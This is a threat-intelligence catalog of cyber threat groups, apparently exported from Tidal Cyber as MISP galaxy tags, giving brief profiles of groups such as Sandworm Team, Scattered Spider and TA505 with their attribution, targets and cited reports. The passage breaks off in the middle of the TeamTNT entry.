[Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) is a cyber espionage group that was first observed in December 2015. While the group has not been definitively attributed, circumstantial evidence suggests the group may be a pro-Indian or Indian entity. [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) has been seen targeting industries related to diplomatic and government agencies. Much of the code used by this group was copied and pasted from online forums. [Patchwork](https://app.tidalcyber.com/groups/32385eba-7bbf-439e-acf2-83040e97165a) was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018.<sup>[[Cymmetria Patchwork](https://app.tidalcyber.com/references/d4e43b2c-a858-4285-984f-f59db5c657bd)]</sup> <sup>[[Symantec Patchwork](https://app.tidalcyber.com/references/a6172463-56e2-49f2-856d-f4f8320d7c6e)]</sup><sup>[[TrendMicro Patchwork Dec 2017](https://app.tidalcyber.com/references/15465b26-99e1-4956-8c81-cda3388169b8)]</sup><sup>[[Volexity Patchwork June 2018](https://app.tidalcyber.com/references/d3ed7dd9-0941-4160-aa6a-c0244c63560f)]</sup>

The tag is: misp-galaxy:groups="Patchwork"

PittyTiger

[PittyTiger](https://app.tidalcyber.com/groups/60936d3c-37ed-4116-a407-868da3aa4446) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.<sup>[[Bizeul 2014](https://app.tidalcyber.com/references/a4617ef4-e6d2-47e7-8f81-68e7380279bf)]</sup><sup>[[Villeneuve 2014](https://app.tidalcyber.com/references/a156e24e-0da5-4ac7-b914-29f2f05e7d6f)]</sup>

The tag is: misp-galaxy:groups="PittyTiger"

PLATINUM

[PLATINUM](https://app.tidalcyber.com/groups/f036b992-4c3f-47b7-a458-94ac133bce74) is an activity group that has targeted victims since at least 2009. The group has focused on targets associated with governments and related organizations in South and Southeast Asia. <sup>[[Microsoft PLATINUM April 2016](https://app.tidalcyber.com/references/d0ec5037-aa7f-48ee-8d37-ff8fb2c8c297)]</sup>

The tag is: misp-galaxy:groups="PLATINUM"

Play Ransomware Actors

Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).

Play is a ransomware operation first observed in mid-2022. Security researchers have observed filename, filepath, and TTP overlaps between Play and Hive and Nokoyawa ransomwares, which themselves are believed to be linked.<sup>[[Trend Micro Play Playbook September 06 2022](/references/2d2b527d-25b0-4b58-9ae6-c87060b64069)]</sup> According to publicly available ransomware extortion threat data, Play has claimed more than 300 victims from a wide range of sectors on its data leak site since December 2022.<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup>

The tag is: misp-galaxy:groups="Play Ransomware Actors"

POLONIUM

[POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) is a Lebanon-based group that has primarily targeted Israeli organizations, including critical manufacturing, information technology, and defense industry companies, since at least February 2022. Security researchers assess [POLONIUM](https://app.tidalcyber.com/groups/7fbd7514-76e9-4696-8c66-9f95546e3315) has coordinated their operations with multiple actors affiliated with Iran’s Ministry of Intelligence and Security (MOIS), based on victim overlap as well as common techniques and tooling.<sup>[[Microsoft POLONIUM June 2022](https://app.tidalcyber.com/references/689ff1ab-9fed-4aa2-8e5e-78dac31e6fbd)]</sup>

The tag is: misp-galaxy:groups="POLONIUM"

Poseidon Group

[Poseidon Group](https://app.tidalcyber.com/groups/553e2b7b-170c-4eb5-812b-ea33fe1dd4a0) is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the [Poseidon Group](https://app.tidalcyber.com/groups/553e2b7b-170c-4eb5-812b-ea33fe1dd4a0) as a security firm. <sup>[[Kaspersky Poseidon Group](https://app.tidalcyber.com/references/e53bc63e-986f-4d48-a6b7-ed8e93494ed5)]</sup>

The tag is: misp-galaxy:groups="Poseidon Group"

StrongPity - Associated Group

The name StrongPity has also been used to describe the group and the malware used by the group.<sup>[[Bitdefender StrongPity June 2020](https://app.tidalcyber.com/references/7d2e20f2-20ba-4d51-9495-034c07be41a8)]</sup><sup>[[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]</sup>

The tag is: misp-galaxy:groups="StrongPity - Associated Group"

PROMETHIUM

[PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) is an activity group focused on espionage that has been active since at least 2012. The group has conducted operations globally with a heavy emphasis on Turkish targets. [PROMETHIUM](https://app.tidalcyber.com/groups/cc798766-8662-4b55-8536-6d057fbc58f0) has demonstrated similarity to another activity group called [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) due to overlapping victim and campaign characteristics.<sup>[[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)]</sup><sup>[[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]</sup><sup>[[Talos Promethium June 2020](https://app.tidalcyber.com/references/188d990e-f0be-40f2-90f3-913dfe687d27)]</sup>

The tag is: misp-galaxy:groups="PROMETHIUM"

APT2 - Associated Group

The tag is: misp-galaxy:groups="APT2 - Associated Group"

MSUpdater - Associated Group

The tag is: misp-galaxy:groups="MSUpdater - Associated Group"

Putter Panda

[Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c) is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). <sup>[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]</sup>

The tag is: misp-galaxy:groups="Putter Panda"

Rancor

[Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c) is a threat group that has led targeted campaigns against the South East Asia region. [Rancor](https://app.tidalcyber.com/groups/021b3c71-6467-4e46-a413-8b726f066f2c) uses politically-motivated lures to entice victims to open malicious documents. <sup>[[Rancor Unit42 June 2018](https://app.tidalcyber.com/references/45098a85-a61f-491a-a549-f62b02dc2ecd)]</sup>

The tag is: misp-galaxy:groups="Rancor"

Rhysida Ransomware Actors

This object represents the behaviors associated with operators of Rhysida ransomware, which is licensed on a ransomware-as-a-service ("RaaS") basis. Various affiliated ransomware operators likely do not operate as a cohesive unit. The Rhysida RaaS operation has been active since May 2023, claiming attacks on multiple sectors in several countries in North and South America, Western Europe, and Australia. Many alleged victims are education sector entities. Security researchers have observed TTP and victimology overlaps with the Vice Society extortion group.<sup>[[HC3 Analyst Note Rhysida Ransomware August 2023](/references/3f6e2821-5073-4382-b5dd-08676eaa2240)]</sup>

Related Vulnerabilities: CVE-2020-1472<sup>[[U.S. CISA Rhysida Ransomware November 15 2023](/references/6d902955-d9a9-4ec1-8dd4-264f7594605e)]</sup>

The tag is: misp-galaxy:groups="Rhysida Ransomware Actors"

Rocke

[Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name [Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between [Rocke](https://app.tidalcyber.com/groups/71222310-2807-4599-bb92-248eaf2e03ab) and the Iron Cybercrime Group, though this attribution has not been confirmed.<sup>[[Talos Rocke August 2018](https://app.tidalcyber.com/references/bff0ee40-e583-4f73-a013-4669ca576904)]</sup>

The tag is: misp-galaxy:groups="Rocke"

Royal Ransomware Actors

Royal is a ransomware group believed to be responsible for hundreds of attacks on victims worldwide, including those in critical infrastructure sectors including manufacturing, communications, healthcare, and education. The actors that comprise the Royal ransomware operation are believed to be former members of other cybercriminal groups linked to Roy/Zeon ransomware, Conti ransomware, and TrickBot. Unlike many of the other most prominent ransomware groups in recent years, the developers of Royal ransomware are not known to lease the malware to affiliates as a service.<sup>[[Kroll Royal Deep Dive February 2023](/references/dcdcc965-56d0-58e6-996b-d8bd40916745)]</sup>

The Royal group often pressures victims into paying ransom demands by threatening to leak data exfiltrated during intrusions. While public data from the [ransomwatch project](https://github.com/joshhighet/ransomwatch) suggest the group has claimed roughly 200 victims since Q4 2022, a November 2023 U.S. government advisory indicated that Royal “has targeted over 350 known victims worldwide” since September 2022, with extortion demands at times exceeding $250 million.<sup>[[GitHub ransomwatch](/references/62037959-58e4-475a-bb91-ff360d20c1d7)]</sup><sup>[[CISA Royal AA23-061A March 2023](/references/81baa61e-13c3-51e0-bf22-08383dbfb2a1)]</sup>

The tag is: misp-galaxy:groups="Royal Ransomware Actors"

RTM

[RTM](https://app.tidalcyber.com/groups/666ab5f0-3ef1-4e74-8a10-65c60a7d1acd) is a cybercriminal group that has been active since at least 2015 and is primarily interested in users of remote banking systems in Russia and neighboring countries. The group uses a Trojan by the same name ([RTM](https://app.tidalcyber.com/software/1836485e-a3a6-4fae-a15d-d0990788811a)). <sup>[[ESET RTM Feb 2017](https://app.tidalcyber.com/references/ab2cced7-05b8-4788-8d3c-8eadb0aaf38c)]</sup>

The tag is: misp-galaxy:groups="RTM"

Telebots - Associated Group

<sup>[[NCSC Sandworm Feb 2020](https://app.tidalcyber.com/references/d876d037-9d24-44af-b8f0-5c1555632b91)]</sup><sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup><sup>[[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]</sup>

The tag is: misp-galaxy:groups="Telebots - Associated Group"

IRON VIKING - Associated Group

<sup>[[Secureworks IRON VIKING ](https://app.tidalcyber.com/references/900753b3-c5a2-4fb5-ab7b-d38df867077b)]</sup><sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup><sup>[[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]</sup>

The tag is: misp-galaxy:groups="IRON VIKING - Associated Group"

Voodoo Bear - Associated Group

<sup>[[CrowdStrike VOODOO BEAR](https://app.tidalcyber.com/references/ce07d409-292d-4e8e-b1af-bd5ba46c1b95)]</sup><sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup><sup>[[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]</sup>

The tag is: misp-galaxy:groups="Voodoo Bear - Associated Group"

ELECTRUM - Associated Group

The tag is: misp-galaxy:groups="ELECTRUM - Associated Group"

BlackEnergy (Group) - Associated Group

The tag is: misp-galaxy:groups="BlackEnergy (Group) - Associated Group"

Quedagh - Associated Group

The tag is: misp-galaxy:groups="Quedagh - Associated Group"

IRIDIUM - Associated Group

<sup>[[Microsoft Prestige ransomware October 2022](https://app.tidalcyber.com/references/b57e1181-461b-5ada-a739-873ede1ec079)]</sup>

The tag is: misp-galaxy:groups="IRIDIUM - Associated Group"

Sandworm Team

[Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) is a destructive threat group that has been attributed to Russia’s General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.<sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup><sup>[[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]</sup> This group has been active since at least 2009.<sup>[[iSIGHT Sandworm 2014](https://app.tidalcyber.com/references/63622990-5467-42b2-8f45-b675dfc4dc8f)]</sup><sup>[[CrowdStrike VOODOO BEAR](https://app.tidalcyber.com/references/ce07d409-292d-4e8e-b1af-bd5ba46c1b95)]</sup><sup>[[USDOJ Sandworm Feb 2020](https://app.tidalcyber.com/references/fefa7321-cd60-4c7e-a9d5-c723d88013f2)]</sup><sup>[[NCSC Sandworm Feb 2020](https://app.tidalcyber.com/references/d876d037-9d24-44af-b8f0-5c1555632b91)]</sup>

In October 2020, the US indicted six GRU Unit 74455 officers associated with [Sandworm Team](https://app.tidalcyber.com/groups/16a65ee9-cd60-4f04-ba34-f2f45fcfc666) for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide [NotPetya](https://app.tidalcyber.com/software/2538e0fe-1290-4ae1-aef9-e55d83c9eb23) attack, targeting of the 2017 French presidential campaign, the 2018 [Olympic Destroyer](https://app.tidalcyber.com/software/073b5288-11d6-4db0-9f2c-a1816847d15c) attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.<sup>[[US District Court Indictment GRU Unit 74455 October 2020](https://app.tidalcyber.com/references/77788d05-30ff-4308-82e6-d123a3c2fd80)]</sup><sup>[[UK NCSC Olympic Attacks October 2020](https://app.tidalcyber.com/references/93053f1b-917c-4573-ba20-99fcaa16a2dd)]</sup> Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as [APT28]([US District Court Indictment GRU Oct 2018(https://app.tidalcyber.com/references/56aeab4e-b046-4426-81a8-c3b2323492f0)]</sup>

The tag is: misp-galaxy:groups="Sandworm Team"

Scarlet Mimic

[Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4) is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group’s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by [Scarlet Mimic](https://app.tidalcyber.com/groups/6c1bdc51-f633-4512-8b20-04a11c2d97f4) and [Putter Panda](https://app.tidalcyber.com/groups/6005f4a9-fe26-4237-a44e-3f6cbb1fe75c), it has not been concluded that the groups are the same. <sup>[[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]</sup>

The tag is: misp-galaxy:groups="Scarlet Mimic"

Roasted 0ktapus - Associated Group

<sup>[[CrowdStrike Scattered Spider BYOVD January 2023](https://app.tidalcyber.com/references/d7d86f5d-1f02-54b0-b6f4-879878563245)]</sup>

The tag is: misp-galaxy:groups="Roasted 0ktapus - Associated Group"

Starfraud - Associated Group

<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:groups="Starfraud - Associated Group"

UNC3944 - Associated Group

<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:groups="UNC3944 - Associated Group"

Scatter Swine - Associated Group

<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:groups="Scatter Swine - Associated Group"

Muddled Libra - Associated Group

<sup>[[U.S. CISA Scattered Spider November 16 2023](/references/9c242265-c28c-4580-8e6a-478d8700b092)]</sup>

The tag is: misp-galaxy:groups="Muddled Libra - Associated Group"

Scattered Spider

[Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) is a cybercriminal group that has been active since at least 2022 targeting customer relationship management and business-process outsourcing (BPO) firms as well as telecommunications and technology companies. During campaigns [Scattered Spider](https://app.tidalcyber.com/groups/3d77fb6c-cfb4-5563-b0be-7aa1ad535337) has leveraged targeted social-engineering techniques and attempted to bypass popular endpoint security tools.<sup>[[CrowdStrike Scattered Spider Profile](https://app.tidalcyber.com/references/a865a984-7f7b-5f82-ac4a-6fac79a2a753)]</sup><sup>[[CrowdStrike Scattered Spider BYOVD January 2023](https://app.tidalcyber.com/references/d7d86f5d-1f02-54b0-b6f4-879878563245)]</sup><sup>[[Crowdstrike TELCO BPO Campaign December 2022](https://app.tidalcyber.com/references/382785e1-4ef3-506e-b74f-cd07df9ae46e)]</sup>

The tag is: misp-galaxy:groups="Scattered Spider"

SideCopy

[SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594) is a Pakistani threat group that has primarily targeted South Asian countries, including Indian and Afghani government personnel, since at least 2019. [SideCopy](https://app.tidalcyber.com/groups/31bc763e-623f-4870-9780-86e43d732594)'s name comes from its infection chain that tries to mimic that of [Sidewinder](https://app.tidalcyber.com/groups/44f8bd4e-a357-4a76-b031-b7455a305ef0), a suspected Indian threat group.<sup>[[MalwareBytes SideCopy Dec 2021](https://app.tidalcyber.com/references/466569a7-1ef8-4824-bd9c-d25301184ea4)]</sup>

The tag is: misp-galaxy:groups="SideCopy"

T-APT-04 - Associated Group

<sup>[[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]</sup>

The tag is: misp-galaxy:groups="T-APT-04 - Associated Group"

Rattlesnake - Associated Group

<sup>[[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]</sup>

The tag is: misp-galaxy:groups="Rattlesnake - Associated Group"

Sidewinder

[Sidewinder](https://app.tidalcyber.com/groups/44f8bd4e-a357-4a76-b031-b7455a305ef0) is a suspected Indian threat actor group that has been active since at least 2012. They have been observed targeting government, military, and business entities throughout Asia, primarily focusing on Pakistan, China, Nepal, and Afghanistan.<sup>[[ATT Sidewinder January 2021](https://app.tidalcyber.com/references/d6644f88-d727-4f62-897a-bfa18f86380d)]</sup><sup>[[Securelist APT Trends April 2018](https://app.tidalcyber.com/references/587f5195-e696-4a3c-8c85-90b9c002cd11)]</sup><sup>[[Cyble Sidewinder September 2020](https://app.tidalcyber.com/references/25d8d6df-d3b9-4f57-bce0-d5285660e746)]</sup>

The tag is: misp-galaxy:groups="Sidewinder"

Whisper Spider - Associated Group

The tag is: misp-galaxy:groups="Whisper Spider - Associated Group"

Silence

[Silence](https://app.tidalcyber.com/groups/b534349f-55a4-41b8-9623-6707765c3c50) is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank’s Automated Workstation Client, ATMs, and card processing.<sup>[[Cyber Forensicator Silence Jan 2019](https://app.tidalcyber.com/references/c328d6d3-5e8b-45a6-8487-eecd7e8cbf7e)]</sup><sup>[[SecureList Silence Nov 2017](https://app.tidalcyber.com/references/004a8877-7e57-48ad-a6ce-b9ad8577cc68)]</sup>

The tag is: misp-galaxy:groups="Silence"

TA407 - Associated Group

<sup>[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]</sup><sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup>

The tag is: misp-galaxy:groups="TA407 - Associated Group"

COBALT DICKENS - Associated Group

<sup>[[Secureworks COBALT DICKENS August 2018](https://app.tidalcyber.com/references/addbb46b-b2b5-4844-b4be-f6294cf51caa)]</sup><sup>[[Secureworks COBALT DICKENS September 2019](https://app.tidalcyber.com/references/45815e4d-d678-4823-8315-583893e263e6)]</sup><sup>[[Proofpoint TA407 September 2019](https://app.tidalcyber.com/references/e787e9af-f496-442a-8b36-16056ff8bfc1)]</sup><sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup>

The tag is: misp-galaxy:groups="COBALT DICKENS - Associated Group"

Silent Librarian

[Silent Librarian](https://app.tidalcyber.com/groups/0e7bd4da-7974-49c9-b213-116bd7157761) is a group that has targeted research and proprietary data at universities, government agencies, and private sector companies worldwide since at least 2013. Members of [Silent Librarian](https://app.tidalcyber.com/groups/0e7bd4da-7974-49c9-b213-116bd7157761) are known to have been affiliated with the Iran-based Mabna Institute which has conducted cyber intrusions at the behest of the government of Iran, specifically the Islamic Revolutionary Guard Corps (IRGC).<sup>[[DOJ Iran Indictments March 2018](https://app.tidalcyber.com/references/7dfdccd5-d035-4678-89c1-f5f1630d7a79)]</sup><sup>[[Phish Labs Silent Librarian](https://app.tidalcyber.com/references/d79d0510-4d49-464d-8074-daedd186f1c1)]</sup><sup>[[Malwarebytes Silent Librarian October 2020](https://app.tidalcyber.com/references/9bb8ddd0-a8ec-459b-9983-79ccf46297ca)]</sup>

The tag is: misp-galaxy:groups="Silent Librarian"

SilverTerrier

[SilverTerrier](https://app.tidalcyber.com/groups/e47ae2a7-d34d-4528-ba67-c9c07daa91ba) is a Nigerian threat group that has been seen active since 2014. [SilverTerrier](https://app.tidalcyber.com/groups/e47ae2a7-d34d-4528-ba67-c9c07daa91ba) mainly targets organizations in high technology, higher education, and manufacturing.<sup>[[Unit42 SilverTerrier 2018](https://app.tidalcyber.com/references/59630d6e-d034-4788-b418-a72bafefe54e)]</sup><sup>[[Unit42 SilverTerrier 2016](https://app.tidalcyber.com/references/a6ba79ca-7d4a-48d3-aae3-ee766770f83b)]</sup>

The tag is: misp-galaxy:groups="SilverTerrier"

Sowbug

[Sowbug](https://app.tidalcyber.com/groups/6632f07f-7c6b-4d12-8544-82edc6a7a577) is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia, particularly government entities, since at least 2015. <sup>[[Symantec Sowbug Nov 2017](https://app.tidalcyber.com/references/14f49074-fc46-45d3-bf7e-30c896c39c07)]</sup>

The tag is: misp-galaxy:groups="Sowbug"

Star Blizzard

Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).

Star Blizzard is believed to be a Russia-based cyber threat actor group. According to joint Cybersecurity Advisory AA23-341A (December 2023), U.S. and international authorities assess that Star Blizzard is “almost certainly” a subordinate of the Russian Federal Security Service (FSB) Centre 18. Star Blizzard is known to successfully use spear-phishing attacks against its targets for information-gathering purposes. The advisory indicated that authorities observed these spear-phishing attacks occurring through 2023. Star Blizzard has traditionally targeted academic, defense, government, non-governmental (NGO), and think tank organizations (and associated personnel) in the United States and United Kingdom, other NATO nations, and countries neighboring Russia. Politicians have also been targeted. According to the advisory, beginning in 2022, authorities witnessed Star Blizzard targeting expand to targets in the defense-industrial sector and U.S. Department of Energy facilities.<sup>[[U.S. CISA Star Blizzard December 2023](/references/3d53c154-8ced-4dbe-ab4e-db3bc15bfe4b)]</sup>

The tag is: misp-galaxy:groups="Star Blizzard"

Stealth Falcon

[Stealth Falcon](https://app.tidalcyber.com/groups/ca3016f3-642a-4ae0-86bc-7258475d6937) is a threat group that has conducted targeted spyware attacks against Emirati journalists, activists, and dissidents since at least 2012. Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates (UAE) government, but that has not been confirmed. <sup>[[Citizen Lab Stealth Falcon May 2016](https://app.tidalcyber.com/references/11f46b1e-a141-4d25-bff0-e955251be7f5)]</sup>

The tag is: misp-galaxy:groups="Stealth Falcon"

ProjectSauron - Associated Group

ProjectSauron is used to refer both to the threat group also known as G0041 as well as the malware platform also known as S0125. <sup>[[Kaspersky ProjectSauron Blog](https://app.tidalcyber.com/references/baeaa632-3fa5-4d2b-9537-ccc7674fd7d6)]</sup> <sup>[[Kaspersky ProjectSauron Full Report](https://app.tidalcyber.com/references/6840c1d6-89dc-4138-99e8-fbd2a45f2a1c)]</sup>

The tag is: misp-galaxy:groups="ProjectSauron - Associated Group"

Strider

[Strider](https://app.tidalcyber.com/groups/deb573c6-071a-4b50-9e92-4aa648d8bdc1) is a threat group that has been active since at least 2011 and has targeted victims in Russia, China, Sweden, Belgium, Iran, and Rwanda.<sup>[[Symantec Strider Blog](https://app.tidalcyber.com/references/664eac41-257f-4d4d-aba5-5d2e8e2117a7)]</sup><sup>[[Kaspersky ProjectSauron Blog](https://app.tidalcyber.com/references/baeaa632-3fa5-4d2b-9537-ccc7674fd7d6)]</sup>

The tag is: misp-galaxy:groups="Strider"

Suckfly

[Suckfly](https://app.tidalcyber.com/groups/06549082-ff70-43bf-985e-88c695c7113c) is a China-based threat group that has been active since at least 2014. <sup>[[Symantec Suckfly March 2016](https://app.tidalcyber.com/references/8711c175-e405-4cb0-8c86-8aaa471e5573)]</sup>

The tag is: misp-galaxy:groups="Suckfly"

TA2541

[TA2541](https://app.tidalcyber.com/groups/1bfbb1e1-022c-57e9-b70e-711c601640be) is a cybercriminal group that has been targeting the aviation, aerospace, transportation, manufacturing, and defense industries since at least 2017. [TA2541](https://app.tidalcyber.com/groups/1bfbb1e1-022c-57e9-b70e-711c601640be) campaigns are typically high volume and involve the use of commodity remote access tools obfuscated by crypters and themes related to aviation, transportation, and travel.<sup>[[Proofpoint TA2541 February 2022](https://app.tidalcyber.com/references/db0b1425-8bd7-51b5-bae3-53c5ccccb8da)]</sup><sup>[[Cisco Operation Layover September 2021](https://app.tidalcyber.com/references/f19b4bd5-99f9-54c0-bffe-cc9c052aea12)]</sup>

The tag is: misp-galaxy:groups="TA2541"

TA459

[TA459](https://app.tidalcyber.com/groups/e343c1f1-458c-467b-bc4a-c1b97b2127e3) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. <sup>[[Proofpoint TA459 April 2017](https://app.tidalcyber.com/references/dabad6df-1e31-4c16-9217-e079f2493b02)]</sup>

The tag is: misp-galaxy:groups="TA459"

Hive0065 - Associated Group

The tag is: misp-galaxy:groups="Hive0065 - Associated Group"

TA505

[TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) is a cyber criminal group that has been active since at least 2014. [TA505](https://app.tidalcyber.com/groups/b3220638-6682-4a4e-ab64-e7dc4202a3f1) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop]([Proofpoint TA505 Sep 2017(https://app.tidalcyber.com/references/c1fff36f-802b-4436-abce-7f2787c148db)]</sup><sup>[[Proofpoint TA505 June 2018](https://app.tidalcyber.com/references/e48dec7b-5635-4ae0-b0db-229660806c06)]</sup><sup>[[Proofpoint TA505 Jan 2019](https://app.tidalcyber.com/references/b744f739-8810-4fb9-96e3-6488f9ed6305)]</sup><sup>[[NCC Group TA505](https://app.tidalcyber.com/references/45e0b869-5447-491b-9e8b-fbf63c62f5d6)]</sup><sup>[[Korean FSI TA505 2020](https://app.tidalcyber.com/references/d4e2c109-341c-45b3-9d41-3eb980724524)]</sup>

The tag is: misp-galaxy:groups="TA505"

Shathak - Associated Group

The tag is: misp-galaxy:groups="Shathak - Associated Group"

GOLD CABIN - Associated Group

The tag is: misp-galaxy:groups="GOLD CABIN - Associated Group"

TA551

[TA551](https://app.tidalcyber.com/groups/8951bff3-c444-4374-8a9e-b2115d9125b2) is a financially-motivated threat group that has been active since at least 2018. <sup>[[Secureworks GOLD CABIN](https://app.tidalcyber.com/references/778babec-e7d3-4341-9e33-aab361f2b98a)]</sup> The group has primarily targeted English, German, Italian, and Japanese speakers through email-based malware distribution campaigns. <sup>[[Unit 42 TA551 Jan 2021](https://app.tidalcyber.com/references/8e34bf1e-86ce-4d52-a6fa-037572766e99)]</sup>

The tag is: misp-galaxy:groups="TA551"

TA577

Operationalize this intelligence by pivoting to relevant defensive resources via the Techniques below. Alternatively, use the Add to Matrix button above, then overlay entire sets of capabilities from your own defensive stack to identify threat overlaps & potential gaps (watch a [60-second tutorial here](https://www.youtube.com/watch?v=4jBo3XLO01E)).

TA577 is a cybercriminal actor that has remained highly active since mid-2020. The actor is known for carrying out email-based campaigns that result in the delivery of a wide range of payloads, including at least one leading to ransomware (REvil) deployment. These campaigns are known to impact organizations in a wide range of sectors and geographic locations.<sup>[[Proofpoint Ransomware Initial Access June 2021](/references/3b0631ae-f589-4b7c-a00a-04dcd5f3a77b)]</sup> The actor appears adept at shifting payloads in response to external factors, for example moving to deliver DarkGate and Pikabot shortly after international authorities disrupted the QakBot botnet in August 2023.<sup>[[Malwarebytes Pikabot December 15 2023](/references/50b29ef4-7ade-4672-99b6-fdf367170a5b)]</sup>

The tag is: misp-galaxy:groups="TA577"

TeamTNT

[TeamTNT](https://app.tidalcyber.com/groups/325c11be-e1ee-47db-afa6-44ac5d16f0e7) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.<sup>[[Palo Alto Black-T October 2020](https://app.tidalcyber.com/references/d4351c8e-026d-4660-9344-166481ecf64a)]</sup><sup>[[Lacework TeamTNT May 2021](https://app.tidalcyber.com/references/5908b04b-dbca-4fd8-bacc-141ef15546a1)]</sup><sup>[[Intezer TeamTNT September 2020](https://app.tidalcyber.com/references/1155a45e-86f4-497a-9a03-43b6dcb25202)]</sup><sup>[[Cado Security TeamTNT Worm August 2020](https://app.tidalcyber.com/references/8ccab4fe-155d-44b0-b0f2-941e9f8f87db)]</sup><sup>[[Unit 42 Hildegard Malware](https://app.tidalcyber.com/references/0941cf0e-75d8-4c96-bc42-c99d809e75f9)]</sup><sup>[[Trend Micro TeamTNT](https://app.tidalcyber.com/references/d6b52135-6bb2-4e37-8f94-1e1d6354bdfd)]</sup><sup>[[ATT TeamTNT Chimaera September 